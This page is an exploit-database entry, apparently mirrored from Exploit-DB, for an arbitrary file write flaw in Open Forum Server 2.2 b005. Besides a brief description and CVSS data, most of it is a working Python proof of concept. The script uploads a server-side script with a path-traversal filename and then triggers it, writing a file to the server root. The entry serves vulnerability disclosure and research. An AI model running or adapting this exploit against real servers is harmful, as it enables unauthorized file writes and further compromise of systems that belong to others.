Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Arbitrary File Write - exploit.company
header-logo
Suggest Exploit
vendor:
Open Forum Server
by:
Unknown
7.5
CVSS
HIGH
Arbitrary File Write
22
CWE
Product Name: Open Forum Server
Affected Version From: 2.2 b005
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:open_forum:open_forum_server:2.2_b005
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Arbitrary File Write

OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system. Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.

Mitigation:

Update to the latest version of Open Forum Server.
Source

Exploit-DB raw data:

# source: https://www.securityfocus.com/bid/40364/info
# 
# OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system.
# 
# Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
#
# OpenForum 2.2 b005 is vulnerable; other versions may also be affected.
#

#============================================================================================================#
#   _      _   __   __       __        _______    _____      __ __     _____     _      _    _____  __ __    #
#  /_/\  /\_\ /\_\ /\_\     /\_\     /\_______)\ ) ___ (    /_/\__/\  ) ___ (   /_/\  /\_\ /\_____\/_/\__/\  #
#  ) ) )( ( ( \/_/( ( (    ( ( (     \(___  __\// /\_/\ \   ) ) ) ) )/ /\_/\ \  ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\    \ \_\      / / /   / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/  #
# \ \ /  \ / // / // / /__  / / /__   ( ( (    \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ /  \ / // /__/_\ \ \ \ \  #
#  )_) /\ (_(( (_(( (_____(( (_____(   \ \ \    \ \/_\/ /   )_) )    \ \/_\/ /  )_) /\ (_(( (_____\)_) ) \ \ #
#  \_\/  \/_/ \/_/ \/_____/ \/_____/   /_/_/     )_____(    \_\/      )_____(   \_\/  \/_/ \/_____/\_\/ \_\/ #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Vulnerability............Arbitrary File Write                                                              #
# Software.................Open Forum Server 2.2 b005                                                        #
# Download.................http://code.google.com/p/open-forum                                               #
# Date.....................5/23/10                                                                           #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Site.....................http://cross-site-scripting.blogspot.com/                                         #
# Email....................john.leitch5@gmail.com                                                            #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# ##Description##                                                                                            #
#                                                                                                            #
# An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be  #
# exploited to write to the local file system of the server.                                                 #
#                                                                                                            #
#                                                                                                            #
# ##Exploit##                                                                                                #
#                                                                                                            #
# Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder.            #
#                                                                                                            #
#                                                                                                            #
# ##Proof of Concept##                                                                                       #
#                                                                                                            #
import sys, socket
host = 'localhost'
port = 80

def send_request(request):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(32) # sometimes it takes a while
    s.connect((host, port))
    s.send(request)

    response = s.recv(8192) + s.recv(8192) # a hack within a hack   

    return response

def write_file():
    try:
        content = '----x--\r\n'\
                  'Content-Disposition: form-data; name="file"; filename="get.sjs"\r\n'\
                  'Content-Type: application/octet-stream\r\n\r\n'\
                  'fileName = "' + '..\\\\' * 256 + 'x.txt";\r\n'\
                  'data = "hello, world";\r\n'\
                  'user = transaction.getUser();\r\n'\
                  'wiki.saveAsAttachment("x",fileName,data,user);\r\n'\
                  'transaction.sendPage("File Written");\r\n\r\n'\
                  '----x----\r\n'
        
        response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1\r\n'
                                'Host: ' + host + '\r\n'
                                'Content-Type: multipart/form-data; boundary=--x--\r\n'
                                'Content-Length: ' + str(len(content)) + '\r\n\r\n' + content)

        if 'HTTP/1.1 302 Redirect' not in response:
            print 'Error writing get.sjs'
            return
        else: print 'get.sjs created'
        
        response = send_request('GET OpenForum HTTP/1.1\r\n'
                                'Host: ' + host + '\r\n\r\n')

        if 'File Written' not in response:
            print 'Error writing to root'
            return
        else: print 'x.txt created in root'
        
    except Exception:
        print sys.exc_info()          

write_file()

Navigation

Suggest Exploit

Services By CQR